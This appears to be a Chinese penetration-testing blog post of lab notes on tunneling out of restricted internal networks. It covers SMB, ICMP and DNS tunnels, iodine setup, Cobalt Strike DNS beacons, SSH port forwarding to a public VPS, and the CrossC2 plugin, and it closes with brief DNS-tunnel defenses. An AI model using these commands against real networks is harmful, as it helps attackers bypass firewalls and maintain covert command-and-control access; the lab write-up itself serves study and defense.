【内网安全】隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

简介: 【内网安全】隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

CS不支持linux主机上线

这里禁用了所有tcp端口,依旧可以ping通,以及dns解析成功


SMB隧道&通讯&上线

判断:445通讯

通过端口扫描是否开放445端口进行判断

上线:借助通讯后绑定上线 详见往期文章

通讯:直接SMB协议通讯即可


ICMP隧道&通讯&上线

判断:ping命令

能ping通说明可以使用icmp隧道

上线:见往期文章

通讯:其他项目(icmpsh icmptunnel)

https://github.com/esrrhs/spp

https://github.com/bdamele/icmpsh

https://github.com/esrrhs/pingtunnel


DNS隧道&通讯&上线

判断:windows:nslookup linux:dig


1、上线环境:内网主机只出网DNS协议数据,解决上线

-域名申请及配置

-监听器创建及配置


-后门绑定监听器及生成

image.png

CS建立DNS隧道上线

mode dns-txt

sleep 0

2、通讯环境:

有些鸡肋

内网主机只出网DNS协议数据,解决通讯

判断出网:nslookup www.baidu.com

项目工具:https://github.com/yarrick/iodine

iodine/ˈaɪədaɪn/单词的意思就是碘 原子序数为 53,53 也是 DNS 服务对应的端口号

安装

yum install iodine   #centos
apt-get intall iodine #ubuntu


-服务器:设置密码xiaodi并创建虚拟IP及绑定域名指向 这里演示linux服务端,windows服务端下载地址 https://code.kryo.se/iodine/


iodined -f -c -P whgojp 192.168.0.1 ns1.whgojp.top -DD


sudo iodined -f -c -P whgojp 192.168.0.1 ns1.whgojp.top -DD

-f 在前台运行

-c 不检查传入请求的客户端 IP 地址

-P 客户端与服务端之间的连接密码

-D 调试级别,-D 表示第一级,-DD 表示第二级,依此类推

192.168.0.1 是自己自定义的局域网虚拟 IP 地址。


设置密码whgojp并创建虚拟IP及绑定域名指向

-客户端:连接密码whgojp并绑定域名指向

windows 演示

iodine -f -M 200 -P whgojp ns1.whgojp.top

70990b0cdd6a77f57eb133b366a14b6f_d6a721e71cb642f1a3c8e739a81fe8b8.png

直接执行会报错,windows客户端可以直接使用编译好的windows版本,同时需要安装TAP网卡驱动程序。也可以下载OpenVPN,安装时只选择TAP Virtual Ethernet Adapter,安装后服务器上就会多出一块“TAP-Wndows ADApter V9”的网卡

1c9b0b772f59a8acf9956bc8761ee803_7bfee7d91faa455dba6c6e412d5682cd.png


都能在对方电脑上安装程序了,还要这样大费周折

双方都新增了一个网卡(dns、TAP-9),从而建立了通道

ping不通是因为靶机上有防火墙

image.png

windows平台iodine建立DNS隧道连接


linux演示

未开防火墙

-尝试通讯尝试连接:

ssh kali@192.168.0.2

这里我尝试ssh连接,但是立即命令中断,可能是DNS配置问题


SSH隧道&通讯

判断:ssh连接

1、上线:

由于CS无SSH协议监听器配置,无法上线

2、通讯:

由于SSH协议存在于Linux系统,跳板机必须Linux


iptables -F /* 清除所有规则 /

iptables -A INPUT -p tcp --dport 22 -j ACCEPT /允许包从22端口进入/

iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /允许从22端口进入的包返回/

iptables -A OUTPUT -p udp --dport 53 -j ACCEPT / 域名解析端口,一般不开 /

iptables -A INPUT -p udp --sport 53 -j ACCEPT / 域名解析端口,一般不开 /

iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /允许本机访问本机/

iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT

iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /允许所有IP访问80端口/

iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT

iptables-save > /etc/sysconfig/iptables /保存配置/

iptables -L / 显示iptables列表 */

开启ssh协议登录:

vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

本地:入站封

将本地访问 10.10.10.132的流量转发至公网vps 1234端口上

ssh -CfNg -R 1122:10.10.10.132:8080 root@47.94.130.xx
curl http://127.0.0.1:1122

image.png


SSH隧道流量转发远程vps-信息探针


远程:出站封

将本地访问10.10.10.132的流量转发至本地的1234的端口上

ssh -CfNg -L 1234:10.10.10.132:8080 root@10.10.10.146
curl http://127.0.0.1:1234

同上输入146密码,访问本地(146)1234端口,


防御DNS隧道攻击的方法

禁止网络中任何人向外部服务器发送DNS请求,只允许与受信任的DNS服务器通信。

虽然没有人会将TXT解析请求发送给DNS服务器,但是邮件服务器/网关会这样做,因此,可以将邮件服务器/网关列入白名单并阻止传入和传出流量中的TXT请求。

跟踪用户的DNS查询次数,如果达到阈值,就生成相应的报告


控制上线-插件-Linux&Mac&IOS&Android

项目:https://github.com/gloxec/CrossC2

面向Linux Mac IOS Android系统上线支持

1、插件使用

2、命令使用

使用参考:

https://gloxec.github.io/CrossC2/zh_cn/

1、下载对应版本加载器和CNA插件

2、上传加载器文件和本地加载CNA插件

3、修改CNA插件配置路径及上传Key文件

4、使用命令或插件绑定HTTPS监听器生成


使用CS4.7版本没有搭建成功


待续

03c0b2017f8f044421ee1aeddf947144_6ed3f01306d340d3be00f6f6e14abc98.png


参考:

https://zhuanlan.zhihu.com/p/379021936

https://www.cnblogs.com/micr067/p/12263337.html

相关文章
|
11月前
|
Ubuntu Linux 网络安全
在Linux云服务器上限制特定IP进行SSH远程连接的设置
温馨提示,修改iptables规则时要格外小心,否则可能导致无法远程访问你的服务器。最好在掌握足够技术知识和理解清楚操作含义之后再进行。另外,在已经配置了防火墙的情况下,例如ufw(Ubuntu Firewall)或firewalld,需要按照相应的防火墙的规则来设置。
594 24
|
10月前
|
安全 网络协议 Linux
Linux查 ssh端口号和服务状态
本指南详细介绍如何检查SSH服务的运行状态,包括通过进程命令验证服务启动、查看监听端口、检测系统服务状态以及防火墙配置。同时提供安全建议,如修改默认端口、禁用密码登录和定期更新系统,确保SSH服务稳定与安全。适用于不同Linux发行版(Systemd/SysVinit),帮助用户全面排查和优化SSH配置。
|
安全 Linux 网络安全
在Linux(CentOS和AWS)上安装更新的git2的方法并配置github-ssh
经过以上这些步骤,你现在就能在GitHub上顺利往返,如同海洋中的航海者自由驰骋。欢迎你加入码农的世界,享受这编程的乐趣吧!
513 10
|
监控 Shell Linux
Android调试终极指南:ADB安装+多设备连接+ANR日志抓取全流程解析,覆盖环境变量配置/多设备调试/ANR日志分析全流程,附Win/Mac/Linux三平台解决方案
ADB(Android Debug Bridge)是安卓开发中的重要工具,用于连接电脑与安卓设备,实现文件传输、应用管理、日志抓取等功能。本文介绍了 ADB 的基本概念、安装配置及常用命令。包括:1) 基本命令如 `adb version` 和 `adb devices`;2) 权限操作如 `adb root` 和 `adb shell`;3) APK 操作如安装、卸载应用;4) 文件传输如 `adb push` 和 `adb pull`;5) 日志记录如 `adb logcat`;6) 系统信息获取如屏幕截图和录屏。通过这些功能,用户可高效调试和管理安卓设备。
|
监控 算法 安全
基于 C# 的内网行为管理软件入侵检测算法解析
当下数字化办公环境中,内网行为管理软件已成为企业维护网络安全、提高办公效率的关键工具。它宛如一位恪尽职守的网络守护者,持续监控内网中的各类活动,以确保数据安全及网络稳定。在其诸多功能实现的背后,先进的数据结构与算法发挥着至关重要的作用。本文将深入探究一种应用于内网行为管理软件的 C# 算法 —— 基于二叉搜索树的入侵检测算法,并借助具体代码例程予以解析。
205 4
|
监控 算法 安全
内网桌面监控软件深度解析:基于 Python 实现的 K-Means 算法研究
内网桌面监控软件通过实时监测员工操作,保障企业信息安全并提升效率。本文深入探讨K-Means聚类算法在该软件中的应用,解析其原理与实现。K-Means通过迭代更新簇中心,将数据划分为K个簇类,适用于行为分析、异常检测、资源优化及安全威胁识别等场景。文中提供了Python代码示例,展示如何实现K-Means算法,并模拟内网监控数据进行聚类分析。
366 10
|
网络协议 Unix Linux
深入解析:Linux网络配置工具ifconfig与ip命令的全面对比
虽然 `ifconfig`作为一个经典的网络配置工具,简单易用,但其功能已经不能满足现代网络配置的需求。相比之下,`ip`命令不仅功能全面,而且提供了一致且简洁的语法,适用于各种网络配置场景。因此,在实际使用中,推荐逐步过渡到 `ip`命令,以更好地适应现代网络管理需求。
777 11
|
存储 运维 安全
深入解析操作系统控制台:阿里云Alibaba Cloud Linux(Alinux)的运维利器
本文将详细介绍阿里云的Alibaba Cloud Linux操作系统控制台的功能和优势。
496 6
|
域名解析 负载均衡 安全
DNS技术标准趋势和安全研究
本文探讨了互联网域名基础设施的结构性安全风险,由清华大学段教授团队多年研究总结。文章指出,DNS系统的安全性不仅受代码实现影响,更源于其设计、实现、运营及治理中的固有缺陷。主要风险包括协议设计缺陷(如明文传输)、生态演进隐患(如单点故障增加)和薄弱的信任关系(如威胁情报被操纵)。团队通过多项研究揭示了这些深层次问题,并呼吁构建更加可信的DNS基础设施,以保障全球互联网的安全稳定运行。
|
缓存 并行计算 Linux
深入解析Linux操作系统的内核优化策略
本文旨在探讨Linux操作系统内核的优化策略,包括内核参数调整、内存管理、CPU调度以及文件系统性能提升等方面。通过对这些关键领域的分析,我们可以理解如何有效地提高Linux系统的性能和稳定性,从而为用户提供更加流畅和高效的计算体验。
646 24

热门文章

最新文章